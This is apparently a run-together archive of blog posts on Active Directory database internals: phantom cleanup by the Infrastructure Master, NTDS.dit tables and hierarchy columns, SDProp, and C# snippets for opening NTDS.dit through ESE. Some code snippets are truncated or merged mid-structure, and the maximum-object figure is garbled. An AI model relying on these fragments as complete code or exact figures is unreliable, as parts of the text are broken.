The IM (Infrastructure Master) in this case (D1-DC1) will periodically run a background task (See The Stale Phantom Background Task ‘ below for details’) that will compare the phantoms within its local database (NTDS.dit) with a GC (Global Catalog Server) in this case (D2-GC1) using the RPC interface method ‘IDL_DRSVerifyNames’ with the flag ‘DRS_VERIFY_DSNAMES’ in this case “Robin Granberg” is one of the phantoms that is being verified, The phantom “Robin Granberg” is matched against the real object representing “Robin Granberg” in the D2 domain by the GUID.
The name is bought back over RPC as a return of the ‘IDL_DRSVerifyNames’, The IM (Infrastructure Master) in this case (D1-DC1) will now compare the obtained name of “Robin Granberg” from the GC (Global Catalog Server) in this case (D2-GC1) and determine that the name doesn’t match as “Robin Granberg” now (as a result of the logical deletion on D2-GC1) have a deletion mangled name “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517”.
D1-DC1 will now create a ‘InfrastructureUpdate’ object using a random GUID as RDN as a descendent/child of the “CN=Infrastructure,DC=D1,DC=X” object with the ‘dnReferenceUpdate’ attribute containing the name updated name “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517”
D1-DC1 will now immediately delete the ‘InfrastructureUpdate’ object created above and let it replicate to other DCs within D1. Note: That the ‘dnReferenceUpdate’ attribute is preserved during logical deletion (e.g. the attribute is present on the tombstone), see the ‘Attributes preserved on logical deletion ‘section above for more information.
The DSAs have special code to detect that a write occurs to the ‘dnReferenceUpdate’ either locally as in this case on (D1-DC1) or via replication, once a write is detected the local phantom is referenced using the GUID and updated accordantly, in this case update the RDN of “Robin Granberg” to “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517”.Note: An additional check is done to determine if the name is deletion mangled as in the case with “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517” this will make all DSAs to locally start removing all backlinks pointing to the phantom “CN=Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517”.
Note: There is no need to set the ‘isDeleted’ attribute as such doesn’t exist on phantoms, the name is already deletion mangled.
Note: There is no need to set the ‘time_col’ column as all phantoms have such. (The only thing preventing them from being garbage collected or physically deleted are that they are still being referenced to)
However going to stage (7.) in the above sample doesn’t physically remove the database row representing the phantom for “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517”. Because it now has a ‘CNT_col’ count of 1 since the ‘InfrastructureUpdate’ object references it.
Note: This means that we will have to wait for a TSL (Tombstone Lifetime) to pass (by default 60/180 days) before the ‘InfrastructureUpdate’ object is being garbage collected, and finally the database row representing the phantom for “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517” will lose the last reference towards it within the database and have ‘CNT_col’ count of 0, next tine the garbage collector runs (by default every 12h) the row representing the phantom “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517” can be physically deleted.
Summary: It takes another 60/180 days + 12h before the database row representing “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517” is gone from D1-DC1 since step (7.) is taken within the sample above.
The Infrastructure Master (IM) process with the Recycle-Bin On
So let’s have a look on how a DC that isn’t a GC (Global Catalog) will update a phantom in the case if the “real” object is being logically deleted in its own domain, specifically in this case if “Robin Granberg” is being logically deleted in the D2 domain. (For simplifying this scenario we have removed the reference in the ‘see-Also’ attribute from ‘Gustav Morath’ to ‘Robin Granberg’)
As the Recycle-Bin is enabled in this case, all DCs that isn’t a GC (Global Catalog) are now responsible by their own, more specifically (D1-DC1) to periodically run a background task (See The Stale Phantom Background Task ‘ below for details’) that will compare the phantoms within its local database (NTDS.dit) with a GC (Global Catalog Server) in this case (D2-GC1) using the RPC interface method ‘IDL_DRSVerifyNames’ with the flag ‘DRS_VERIFY_DSNAMES’ in this case “Robin Granberg” is one of the phantoms that is being verified, The phantom “Robin Granberg” is matched against the real object representing “Robin Granberg” in the D2 domain by the GUID.
The name is bought back over RPC as a return of the ‘IDL_DRSVerifyNames’, The DC in this case (D1-DC1) will now determine if the state of the object has changed as follows:
If the name obtained from the GC (Global Catalog) in this case (D2-DC1) is different from the name of the local phantom in this case “Robin Granberg” (as a result of the logical deletion on D2-GC1) the name has changed to a deletion mangled name “Robin Granberg\0ADEL:0f09760e-e13b-457a-b207-ddb3d7824517” – this local phantom will be updated to reflect the name change.
If the phantom is logically deleted in the local database (NTDS.dit) in this case (D1-DC1) but the obtained state from the GC (Global Catalog) in this case (D2-GC1) says it isn’t anymore the following actions are taken locally on the DC, in this case (D1-DC1)
Activate Forward Links
Activate Back Links
If the phantom locally represents a live object in the database (NTDS.dit) in this case at (D1-DC1) but the obtained state from the GC (Global Catalog) in this case (D2-GC1) says it’s logically deleted, the following actions are taken locally on the DC, in this case (D1-DC1)
Forward Links are deactivated.
Back Links are deactivated.
If the phantom is recycled locally in the database (NTDS.dit) in this case at (DC1-DC1) but the obtained state from the GC (Global Catalog) in this case (D2-GC1) says it isn’t anymore the following actions are taken locally on the DC, in this case (D1-DC1)
The ‘recycle_time_col’ is set to NULL.
If the phantom isn’t locally recycled in the database (NTDS.dit) in this case at (DC-D1) but the obtained state from the GC (Global Catalog) in this case (D2-GC1) says it is, the following actions are taken locally on the DC, in this case (D1-DC1)
Forward Links are removed
Back Links are removed
The ‘recycle_time_col’ is being set.
The Stale Phantom Background Task The IM (infrastructure Master) will scan its local NTDS.dit database for phantoms used by a rouge estimate of a scan rate on how long it should take to scan and verify all phantoms based on days, by default 2 days, the default value can be configured by a registry parameter: “Days per Database Phantom Scan”.
‘Days per Database Phantom Scan’ DWORD registry values can be configured within the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<INSTANCE>\Parameters. Note: a value of 0 can’t be used and a maximum of 365 days.
This means that the DSA acting as the IM (infrastructure Master) or if the Recycle-Bin is enabled all DSAs that isn’t also acting as GCs (Global Catalog Servers) will scan it’s local database (NTDS.dit) more or less aggressively to meet the rate of ‘Days per Database Phantom Scan’ – using the following algorithm:
Make sure that next pass runs no more frequent than 15mins and no less than 1h
1. If calculatedDelay < 900 (15 minutes)
Next Scan will take place within 15min.
2. If calculatedDelay > 86400 (24h)
Next Scan will take place within 24h.
If (calculatedDelay by passes 1. and 2. above)
Next Scan will take place within <calculatedDelay>
Once a local phantom scan on the IM (Infrastructure Master) or if the Recycle-Bin is enabled, on all DSAs that isn’t also acting as a GC (Global Catalog Server) has been initiated (at least every 24 hours) it will scan the local database for phantoms and verify if they are up-to-date or have become outdated (stale) against a Global Catalog Server (GC) until.
It made maximum allowed trips (10) to a GC (Global Catalog) to verify phantoms (a maximum of 240 phantoms are verified on each trip) – the requirement of making no more than 10 trips to a GC (Global Catalog) comes from not taking up the DSA’s task queue for too long.
The following is only applicable if the Recycle-Bin is off: Maximum allowed stale phantoms (720) has been returned by the GC (Global Catalog) and has been identified as stale – the requirements of updating a maximum of 720 stale phantoms comes from the limits on 800~ values in a none-linked multi-valued attribute back in the Windows 2000 days when the stale phantoms are being written to the infrastructureUpdate object (carrier-object)’s dnReferenceUpdate attribute.
All phantoms in the database have already been verified by the GC (Global Catalog) without hitting the limits of (1.) or (2.) if the Recycle-Bin is off above.
The task will reschedule itself using the algorithm above.
The following event will be logged once the task is completed:
Table 24: Stale Phantom Cleanup Sucess Event
Event ID
Source
Category
Description
1421
ActiveDirectory_DomainService
Directory Access
Internal event: The infrastructure update task has completed with the following results.
Queried phantom references:
<Numbers of Queried phantoms>
Phantom references that exist on the local domain controller:
<Rogue estimate of phantoms in the database>
Updated phantom references:
<Phantoms updated during this run>
The infrastructure update task will resume after the following interval.
The Stale Phantom background task can be initiated manually by triggering the operational attribute: checkPhantoms http://msdn.microsoft.com/en-us/library/cc223316(v=prot.20).aspx Note: The task can only be trigged on the DC holding the flexible single master operations role: Infrastructure or on all DCs (Not Global Catalog Servers) if the Recycle-Bin is enabled and is still subject to the algorithm above but won’t automatically re-schedule itself. (E.g. you may need to call the operational attribute multiple times to verify all phantoms)
Local Lingering Phantoms
Local lingering phantoms is a phantom that dose exists locally in the database (NTDS.dit) on the IM (Infrastructure Master) or if the Recycle-Bin is enabled, on all DSAs that isn’t also acting as a GC (Global Catalog) but the real object that the local phantom represents can’t be found/verified at a GC (Global Catalog) – reasons for this can be:
The object that the phantom represents has been physically deleted (e.g. garbage collected) in its source domain, while the local phantom has not. This is common for simple references, that prevents the local phantom from being physically deleted (e.g. garbage collected) because references are pointing towards it.
Object’s in the distribution database (NTDS.dit) that are deleted during installation (DCPROMO)
The following events are logged if a local lingering phantom is detected:
Table 25: Local Lingering Phantom Event
Event ID
Source
Category
Description
2126
ActiveDirectory_DomainService
Directory Access
The phantom object <Lingering Phantom> exists in the local Active Directory Domain Services database, but doesn’t exist in the database of another GC. This may indicate that replication has not completed, or may indicate that the local AD_TERM database contains a lingering phantom. If this state persists, it indicates a lingering phantom.
Used by the phantom cleanup task to find reference phantoms to be verified for staleness.
Note: Only present in Windows Server 2008 R2 databases and later
The following Performance Monitors are available to track Stale Phantom Cleanup activity:
Table 27: Stale Phantom Cleanup Performance Counters
Category
Name
Operating System
Description
NTDS
Phantoms Visited/sec
Windows Server 2008 or later
The rate at which phantoms are visited to determine if they are stale and need to be cleaned.
NTDS
Phantoms Cleaned/sec
Windows Server 2008 or later
The rate at which stale phantoms are cleaned.
I think this is all I can think of for now when it comes to Active Directory and deletions/removal of data – if you have continued to read to the end, you can see it’s pretty much put into the fundamentals of Active Directory and is rather complex.
So what is the “Code [1-3]” all about and where is Part 4 of the series that you might expect?
Before I go ahead with Part 4 I thought it would be a good idea to sum up Part 1 to Part 3 with code (So that you know how we figured out all this stuff while we was coding on ESEDump) – Note: This most may be targeted for the developer audience more than the general Active Directory administrator.
Disclaimer: The code samples provided here is code snippets that doesn’t represent any code actual code from the DSA and or any other Microsoft products and technologies, nor those they represent the complete source of ESEDump
ESEHelper – A managed ESE wrapper around the ESE APIs
We decided that we wanted to work with ESE in C# (and when we first started this project EseManaged from codeplex wasn’t around) and even if we could have used it later on – I guess we wanted full control and decided to stick with our own wrapper. So when you see references to “EseHelper” in the code snippets below – you know it’s just a wrapper around: Extensible Storage Engine Native APIs – there is no secrets around this J
JET_RETRIVECOLUMN structure custom methods
We extended the JET_RETRIVECOLUMN structure with some additional methods to retrieve data.
Table 0: JET_RETRIVECOLUMN structure
Code Snippet
// The custom methods in JET_RETRIEVECOLUMN allow us to quickly// interpret each column’s data depending on its data type (string, integer, etc.)
internal struct JET_RETRIEVECOLUMN
{
public int columnid;
public IntPtr pvData; // Pointer to the data block in memory
public int cbData; // Size of the allocated data block
public int cbActual; // Size of the actual/used data
public int grbit;
// Offset to the first byte to be retrieved from a column of type
// JET_coltypLongBinary or JET_coltypLongText
public int ibLongValue;
// Number of values in a multi-valued column
// Can be used to retrive a specific value
public int itagSequence;
// The columnid of the tagged, multi-valued, or sparse column
// when all tagged columns are retrieved by passing 0
// as the columnid to JetRetrieveColumn.”
public int columnidNextTagged;
public int err;
public void Initialize(ColumnInfo att)
{
this.Initialize(att.ID, 0);
}
public void Initialize(ColumnInfo att, int cbData)
{
// Initialize with a data block of cbData size
this.Initialize(att.ID, cbData);
}
public void Initialize(int columnid)
{
// Initialize with an empty data block
this.Initialize(columnid, 0);
}
public void Initialize(int columnid, int cbData)
{
// Reset the fields
this.cbActual = 0;
this.cbData = 0;
this.err = 0;
// Make sure to free any previously used memory in this instance
if (this.pvData != IntPtr.Zero)
{
Marshal.FreeHGlobal(this.pvData);
this.pvData = IntPtr.Zero;
}
this.columnid = columnid;
this.itagSequence = 1;
// Allocate a new memory block if necessary (if > 0 bytes requested)
this.cbData = cbData;
if (this.cbData > 0)
this.pvData = Marshal.AllocHGlobal(this.cbData);
}
// Copies the current memory block into a byte array
public IntPtr TableId; // added for table support in caching
public ColumnInfo(int id, string name, int type, string altname, int altid, IntPtr tableid)
{
this.ID = id;
this.Name = name;
this.DataType = type;
this.AltName = altname; //added for attribute name
this.AltId = altid;
this.TableId = tableid; //added for table support in caching
}
}
Perform Initialization and Attach to NTDS.dit
First thing we had to figure out was how we attached to the database (NTDS.dit) using JetInit, JetBeginSession, JetAttachDatabase and finally calling JetOpenDatabase in addition to those callas we had to set several parameters with JetSetSystemParameter for our usage, e.g there is things that need to be turned off as we attach/open the DB as read-only due to the nature of our application.
Table 1: ESE Initialization
Code Snippet
// E.Check makes sure a JET API call is successful, i.e. JET_errSuccess (0)// If the call fails, we throw an exception/write to the Console
// Initialize ESENT. Setting JetInit will inspect the logfiles to see if the last
// shutdown was clean. If it wasn’t (e.g. the application crashed) recovery will be
// run automatically bringing the database to a consistent state.
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramDatabasePageSize), new IntPtr(0x2000), null));
// Set up the recovery option (off), the maximum number temporary tables (7) and temporary path
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramRecovery), IntPtr.Zero, “off”));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramEnableOnlineDefrag), IntPtr.Zero, null));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(0xa), IntPtr.Zero, null));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramMaxTemporaryTables), new IntPtr(7), null));
err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramTempPath), IntPtr.Zero, System.IO.Path.GetTempPath()));
// Initialize ESE and begin a session
err = E.Check(EseHelper.JetInit(ref instance));
err = E.Check(EseHelper.JetBeginSession(instance, out sesid, null, null));
err = E.Check(EseHelper.JetOpenDatabase(sesid, “NTDS.dit”, null, out dbid, 1));
List the tables inside NTDS.dit
We figured out that by statically opening the “MSysObjects” and positioning over the “RootObjects” index we could enumerate the tables inside the database using the following code snippet.
Table 2: ESE Enumerate tables inside the database
Code Snippet
// Simplified:// Method to obtain a list of tables for a given JET database
In Part 3, we’re discussing the usage of the “Ancestors_col” column and how it’s used to walk subtrees in the database, the DNTs are stored as bytes within the “Acenstors_col” and are read as in the code snippet below.
Table 3: Ancestors_col
Code Snippet
if (column.err != EseErrors.ColumnNull) {
string ancestory = null;
char[] ancestor_separator = { ‘,’ };
// Walk through every ancestry record in the returned column data
// Construct the ancestry string with the returned DNTs
for (int i = 0; i < column.GetData().Length; i += sizeof(int))
{
int dnt = BitConverter.ToInt32(column.GetData(), i);
Note: This is our way to read an objects full distinguished name, given an object’s DNT (Distinguished Name Tag) – But this is not considered safe by the DSA as mentioned in Part 3 as the “Ancestors_col” is being processed by a background task and might not be in-sync all the times. (Safer would be to walk the tree up – by each PDNT until PDNT == 2)
Table 4: Get an objects distinguished name by its DNT
This is the third post in a series of articles that will describe what’s really inside NTDS.dit and how Active Directory works on the database layer, the past two articles has been about:
Given the knowledge from the last article in the series on how objects are referred to each other in terms of a parent – child relation (DNT and PDNT) it becomes obvious that it is easy to get all direct-descendent/child objects of a given object by searching for all object’s (rows) that have a specific PDNT (where objects.PDNT == parent.DNT) this can efficiently be archived by using the “PDNT_index”
[1.1]: “Name” represent the RDN attribute, it’s not stored/named as described in the illustration above, it’s rather stored as “ATTm589825” I choose to represent it as “Name” for simplifying the understanding
Introducing the Ancestors_col and support for subtree searches
Support for subtree searching requires the implementation of another column at the DBLayer, the “Ancestors_col”; the other columns are we already familiar with as of the last post in the series
Table 2: datatable – Simplified for hierarchy representation 2
Every object/phantom within the “datatable” contains a unique DNT value.
ESE enforces uniqueness by declaring DNT to be an ESE auto-incrementing column (JET_bitColumnAutoincrement.)
DNT is the primary key of the “datatable”, so objects are clustered in storage by DNT, and access to an object by DNT is more efficient than access via any other column/attribute. Since new objects are created in ascending DNT order, the primary key organization does not slow down the creation of new objects.
The PDNT column holds the DNT of the parent of an object.
The tree structure of objects is not represented by pointers from parent to child, as you might expect given how the tree is normally browsed, but by a pointer in each child object/row to its parent
The Ancestors_col holds the DN path [2.1] (every DNT from the root in the hierarchy to the objects DNT) in a binary blob. This always efficient subtree searches by searching the Ancestors_col with a prefix of DNTs to the root:ed object [2.2]
[2.1]: The first object/row within the “datatable” always has a NULL ancestory_col value. [2.2] See “Table 4: Ancestors_index”
Let’s apply “Table 2” to a theoretical sample:
[3.1]: “Name” represent the RDN attribute, it’s not stored/named as described in the illustration above, it’s rather stored as “ATTm589825” I choose to represent it as “Name” for simplifying the understanding
If we wanted to do an subtree search with the “Windows Development” organizational unit as the search base – we would like to use an index over the “ancestors_col” [4.1] and set the prefix to be “2,1787,1788,1789,1790,5520,5521*” that would return a list of all objects (rows) that are subordinated the “Windows Development” organizational unit (e.g. all children).
The ancestors_col and the SDProp (Security Descriptor Propagation Demon) – How are they related?
The “ancestors_col” complicates an object move (Within the same NC/Database, We leave cross-NC/database moves outside this article for simplify understanding)
Given the knowledge from the last article in the series on how objects are referred to each other in terms of a parent – child relation (DNT and PDNT) – It seems easy to implement an object move by simply change the PDNT to the DNT of the new designated parent (e.g. give “Christoffer Andersson” a value of “5521” in his “PDNT_col” and the object is now subordinated the organizational unit “Windows Development” instead of “Users” in the above sample)
After the operation above, the “Ancestors_col” wouldn’t be accurate, so the Ancestors_col needs “fixup”, (e.g. it needs to be adjusted to the new path “2,1787,1788,1789,1790,5520,5521,,5524” – “5522” has to be removed as we moved the object “Christoffer Andersson” from the “Users” organizational unit to the “Windows Development” organizational unit) This might not seem to be an issue at the first glance, but imagine moving a large subtree – the operation wouldn’t fit into an single atomic transaction, therefore ancestry fixup is performed in the background by the SDProp (Security Descriptor Propagation Demon) [4.1]
The most experienced Active Directory administrators at least have heard of “SDProp” that is a short for the Security Propagation Demon and some know that it’s responsible for handling propagation of ACE inheritance, very few probably know that it is in addition also responsible to maintain the acenstors_col at the DBLayer.
Each DSA/DC runs the SDProp (Security Descriptor Propagation Demon) as a background task (TQ_TASK). By default, this task is triggered by the following conditions:
Any modification (originating or replicated) of the nTSecurityDescriptor attribute of any object (Except for those modifications done by the SDProp demon)
This requires that any new/modified inheritable ACEs are propagated to all descendant objects and that any removed inheritable ACEs are removed from all descendent objects, ACE inheritance is not replicated and is being applied by the SDProp using this process on all DSAs/DCs.
Any modification of the “PDNT_col” (object is being moved in the directory) of an object that results in the object having a different parent (Except for those cases where the new parent is a Deleted Objects container)
This requires adjustments of the values (DNTs) stored in the “ancestors_col” as the object/row has been moved.
This requires that all inheritable ACEs present on the new parent object (and all its ancestors from the top) are being propagated down to the object, and that inheritable ACEs originating from the previous parent (and all its ancestors from the top) has to be removed.
Responsible for propagation of inheritable ACEs, if inheritable ACEs are being added or removed from an object’s SD (Security Descriptor) – SDProp is responsible for propagating those ACEs to all descendant / child objects of the object where the ACEs where added. [4.2]
Ancestors_col fixup
If any modification to an object’s parent “PDNT_col” occur (Simply an object move) – SDProp is responsible to adjust the “ancestors_col” to match the full path of DNTs from the top down to the object with respect to its new parent.
[4.1] Since this work is performed in the background and SDProp (that runs on single thread doesn’t implement a limit of how many transactions that is used to perform an operation) there may be a period of time when Active Directory returns inconsistent query results with the tree structure, and inheritable ACEs won’t be accurate.
[4.2]: A common misunderstanding is that the SDProp is responsible for maintaining protection for object’s that is protected by the AdminSDHolder, That’s incorrect. The AdminSDHolder runs in its own background task (TQ_TASK) every 60 minutes on the PDC (if a protected object’s security descriptor mismatches from the once at the adminSDHolder object, inheritance is turned off and the security descriptor is over written with the one at the adminSDHolder object) that makes the AdminSDHolder background task to trigger off SDProp .
Trigger the SDProp from manually from the outside.
It’s possible to use an operational attribute to trigger the SDProp demon to run from the “outside” (e.g be performed by an administrator) – How ever on a fully functional DSA/DC there is no need to invoke the SDProp manually, the SDProp can be trigged globally or for a specific object /row identified by its DNT, The requester must have the “Recalculate-Security-Inheritance” control access right on the nTDSDSA object for the DSA/DC
The following shows an LDIF sample that performs this operation on the entire DIT.
This is the second post in a series of articles that will describe what’s really inside NTDS.dit and how Active Directory works on the database layer, In an earlier post I explained the tables within NTDS.dit in detail as far as what they are used for, in which release of Active Directory (Windows Server) they were introduced in, as well any major changes being added in later versions: How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 1
This post will go into the details of the contents of the “datatable” also known as the object store – that contains all objects and phantoms [1.1] represented as rows (1 object/phantom = 1 row in the table) from any instanced naming context (NC) held as either writable or read-only (until they are physically removed by the garbage-collector) by the Directory System Agent (DSA) hosting the database and where columns represent every [1:3] attribute present in the schema except linked attributes [1:2]
[1.1]: phantoms are references to object’s hosted outside the given database (NTDS.DIT) and the given Directory System Agent (DSA) – (Except structural phantoms)
[1:2] Post-Windows Server 2003 the attribute “ntSecurityDescriptor” is stored in the “sd_table” rather than in the “datatable”
[1:3] Some columns doesn’t reflect attributes and are columns pre-defined in the NTDS.dit template database generated by Microsoft (those are needed for internal states to the DSA)
Maintain the hierarchy of an object tree within a flat object store
The hierarchy in Active Directory is quite obvious to most of us at a simplified layer e.g. daily administrative task such as creating an Organizational Unit and creates several descendent/child objects under neat it, some people may refer to some objects as leaf objects (object that usually don’t contain descendent/child objects) such as object of the class “user” – However the fact is that any object within Active Directory has the possibility (technically) to contain one or more descendent/child objects – this is controlled by schema constrains and more specifically the sum of the following attributes of a given object class and any inherited class (except for auxiliary classes) :
Table 1: Possible Superiors
Attribute
Description
possSuperiors
Contains references to object classes that can host the given as a descendent/child object.
possSuperios can be modified on both cat1 and cat2 schema class object’s after that they have been instantiated in the schema.
systemPossSuperiors
Contains references to object classes that can host the given as a descendent/child object.
systemPossSuperiors can’t be modified from the outside, once being instanced after the initial creation of the class within the schema.
Why it’s easy for all objects to host descendants/child objects becomes more obvious when the hierarchy is explained at the DBLayer.
The question remains with the details given above, if one row within the “datatable” represents an object/phantom, how can the hierarchy be maintained? The below table “Table 2” represent columns in the “datatable” that are vital for representing/building the hierarchy in the directory at the DBLayer.
Table 2: datatable – Simplified for hierarchy representation 1
Every object/phantom within the “datatable” contains a unique DNT value.
DNT is a short for distinguished name tag.
ESE enforces uniqueness by declaring DNT to be an ESE auto-incrementing column (JET_bitColumnAutoincrement.)
DNT is the primary key of the “datatable”, so [2.1] objects are clustered in storage by DNT, and access to an object by DNT is more efficient than access via any other column/attribute. Since new objects are created in ascending DNT order, the primary key organization does not slow down the creation of new objects.
The PDNT column holds the DNT of the parent of an object [2.2].
PDNT is a short for parent distinguished name tag.
The tree structure of objects is not represented by pointers from parent to child, as you might expect given how the tree is normally browsed, but by a pointer in each child object/row to its parent
[2.1]: The maximum numbers of objects/phantoms that ever can be created on a given DSA (Domain Controller) for its entire life time is 2 billion objects (147,483,393 (231 minus 255)). Note that this count against objects/phantoms ever introduced to the local DSA as part of any naming context (NC) writable or partial ever hosted by the DSA. * If the DSA is promoted by using IFM (Install from Media it inheritance the count of already allocated DNTs from the former DSA) – When the maximum numbers of auto-increment values has been used (the limit mention above have been hit) the following error are returned at the DBLayer: JET_errOutOfAutoincrementValues -1076 from the outside we will notice: “Error: Add: Operations Error. <1> Server error: 000020EF: SvcErr: DSID-0208044C, problem 5012 (DIR_ERROR), data -1076.” Read more about Active Directory Limits: http://technet.microsoft.com/en-us/library/active-directory-maximum-limits-scalability(v=ws.10).aspx#BKMK_Objects
[2.2]: The first row introduced in the “datatable” isn’t a real object nor is it a phantom and is named “$NOT_AN_OBJECT1$” and have its PDNT_col set to NULL. The “PDNT_col” is indexed so becomes very easy to drive an object’s direct-descendants/child objects (not all descendants) by simply query who that has the object’s DNT in their PDNT_col.
[2:3] The DSA has an in-memory cache for the most common RDNs (the ones mentioned above) Active Directory allows us to use a custom attribute as RDN as well by specify the attributeID of that custom attribute as the rDNAttID for the particular class. * A RDN attribute must have the syntax string **customization may not be supported by all LDAPv3 clients. *** rDNAttID should preferably be set before any objects of the given class is instanced in the directory (changes won’t apply to already instanced/existing objects)
Let’s apply “Table 2” to a theoretical sample:
[3.1]: “Name” represent the RDN attribute, it’s not stored/named as described in the illustration above, it’s rather stored as “ATTm589825” I choose to represent it as “Name” for simplifying the understanding of the hierarchy in this case.
[3.2] Structural Phantom – (Different from a phantom used for reference integrity to real object’s hosted outside the given DIT) is used to represent the full distinguished name of the domain e.g “DC=ntdev,DC=corp,DC=chrisse,DC=com”
In the next article – we will continue the deep-dive into the content and the structure of the “datatable” – going thru things like ancestors, the difference between phantoms and real objects, tombstones and the garbage collector on the DBLayer and much more.
You might as I have asked yourself many times – What is inside NTDS.dit? (Most experienced Active Directory admins knows that NTDS.dit is the database and the physical on disk store that Active Directory uses to store information – most of you have probably got in touch with NTDS.dit during backup and restore scenarios)
Long story in a short version – I wasn’t satisfy not knowing – neither was I after being reading the following article: (That I actually think isn’t that bad – but is also probably the most detailed public available information on the subject) [1] http://technet.microsoft.com/en-us/library/cc772829(WS.10).aspx
So I decided with a very good friend of mine Stanimir Stoyanov (Microsoft Visual C# MVP) to go ahead and build a tool that could read NTDS.dit and decode its internals, and then we started a journey that has given us invaluable knowledge at this part of Active Directory, this is the first article in a series of articles that will describe what’s really inside NTDS.dit and how Active Directory works on the database layer.
The illustration below has been presented in various documentations since Active Directory was initially released over 10 years ago; a similar illustration is also available in (However after this research project it’s actually turning out to be inaccurate in some aspects – in the way the DRA/REPL communicates with the DBLayer) [1]
Table 1: DSA Components (Simplified for the DBLayer)
Component
Description
Ntdsa.dll – Directory System Agent
The DSA, which runs as Ntdsa.dll on each domain controller, provides the interfaces through which directory clients and other directory servers gain access to the directory database (the DBLayer). In addition, the DSA enforces directory semantics, maintains the schema, guarantees object identity, and enforces data types on attributes.
Esent.dll – Extensible Storage Engine (ESE) APIs
The Extensible Storage Engine (ESE) is an advanced indexed and sequential access method (ISAM) storage technology. ESE enables applications to store and retrieve data from tables using indexed or sequential cursor navigation. It supports denormalized schemas including wide tables with numerous sparse columns, multi-valued columns, and sparse and rich indexes. It enables applications to enjoy a consistent data state using transacted data update and retrieval.
The on physical-disk file that represent the ESE/JetBlue database that holds the information store for the given DSA/Active Directory Domain Controller.
Data Store Physical Structure / Inside NTDS.dit – Tables
Finally we can start looking into the content/internal structure of NTDS.dit – but first let’s take a look on what has been reveled before, the illustration below is from [1] and is accurate as far as outside the white box that represent the tables within the database, the tables do exist (Except for * “sd_table” on Windows 2000 DSAs) – but there is more tables that isn’t mentioned in this example.
So it’s about time to reveal the real table structure of an NTDS.dit database file – It’s time to use the tool we produced to first discover this:
Table 2: NTDS.DIT – Tables
Table
Description
Minimum DSA Version
Datatable
Contains all objects and phantoms [2.1] represented as rows (1 object/phantom = 1 row in the table) from any instanced naming context (NC) held as either writable or read-only by the Directory System Agent (DSA) hosting the database and where columns represent every [2:3] attribute present in the schema except linked attributes [2:2]
[2.1]: phantoms are references to object’s hosted outside the given database (NTDS.DIT) and the given Directory System Agent (DSA)
[2:2] Post-Windows Server 2003 the attribute “ntSecurityDescriptor” is stored in the “sd_table” rather than in the “datatable”
[2:3] Some columns doesn’t reflect attributes and are columns pre-defined in the NTDS.dit template database generated by Microsoft (those are needed for internal states to the DSA)
Windows 2000 Server
Note: Windows Server 2008 R2 added a column to support the “is-Recycled” state
Hiddentable
Contains one row but several columns that defines the state of the database as well the [2:2] DNT (reference) of the NTDSA-Settings object that represents this DSA (used for finding config information specific to this domain controller.)
[2:4] The concept of DNTs (Distinguished Name Tags)
Windows 2000 Server Note: Windows Server 2003 Introduced additional state columns such as backupexpiration_col
Link_table
Contains link-pair references (DNT, DNT), the link base (link id >> 1) and possibly a binary blob (In case of DN-binary, DN-string syntax)
Windows 2000 Server
Note: Windows Server 2008 R2 added a column to support deactivated links for recycle-bin
Sd_table
Contains single-instance-stored SDs (Security Descriptors) that pre-Windows Server 2003 was stored in the ntSecurityDescriptor attribute in the “datatable” – those are now instead referenced to the SDs in the “sd_table” that is, if more than one object has exactly the same security defined (Security Descriptor) both objects are referenced to the same row in the “sd_table”, hence the single-instance-storage and reducing the size needed to store Security Descriptors.
Windows Server 2003.
Sdpropcounttable
Used by the Security Descriptor Propagation Demon (SDProp) responsible for Security Descriptor inheritance down the tree, within the local database
Sdproptable
Used by the Security Descriptor Propagation Demon (SDProp) responsible for Security Descriptor inheritance down the tree, within the local database
Windows 2000 Server
Quota_rebuild_progress_table
Contains temporary information during quota tracking rebuild, for the Active Directory quota feature introduced in Windows Server 2003 – this allows the demon to keep track of processed objects.
Windows Server 2003
Quota_table
Contains quota tracking information, for the Active Directory quota feature introduced in Windows Server 2003, quota tracking is peer naming context (NC) and for a given security principal identified by its SID.
Windows Server 2003
MSysObjects
ESE Internals – out of scope for this article
N/A
MSysObjectsShadow
ESE Internals – out of scope for this article
N/A
MSysUnicodeFixupVer2
ESE Internals – out of scope for this article
N/A
In the next article – we will take a deep-dive into the content and the structure of the “datatable” also known as the object-store.
This is the second and last blog post (If someone really cares about the differences for ADAM /AD LDS I can point that out to – just send me and e-mail) that completes a series of posts covering how the “Install from media” feature really works, it’s an in-depth very technical series of posts that explains what happens under the hood and this second post explains the changed regarding to this feature that was introduced with Windows Server 2008 (Most of the changes made are to support RODCs as you will noticed if you counties to read).
Note: This article is Windows Server 2003 Install From Media (IFM) functionality + Changes made in Windows Server 2008 and later (This article doesn’t go through the list of functionality that has been left unchanged from Windows Server 2003 again, therefore I recommend to read part 1 first: How install from media (IFM) really works (Part 1)
Background
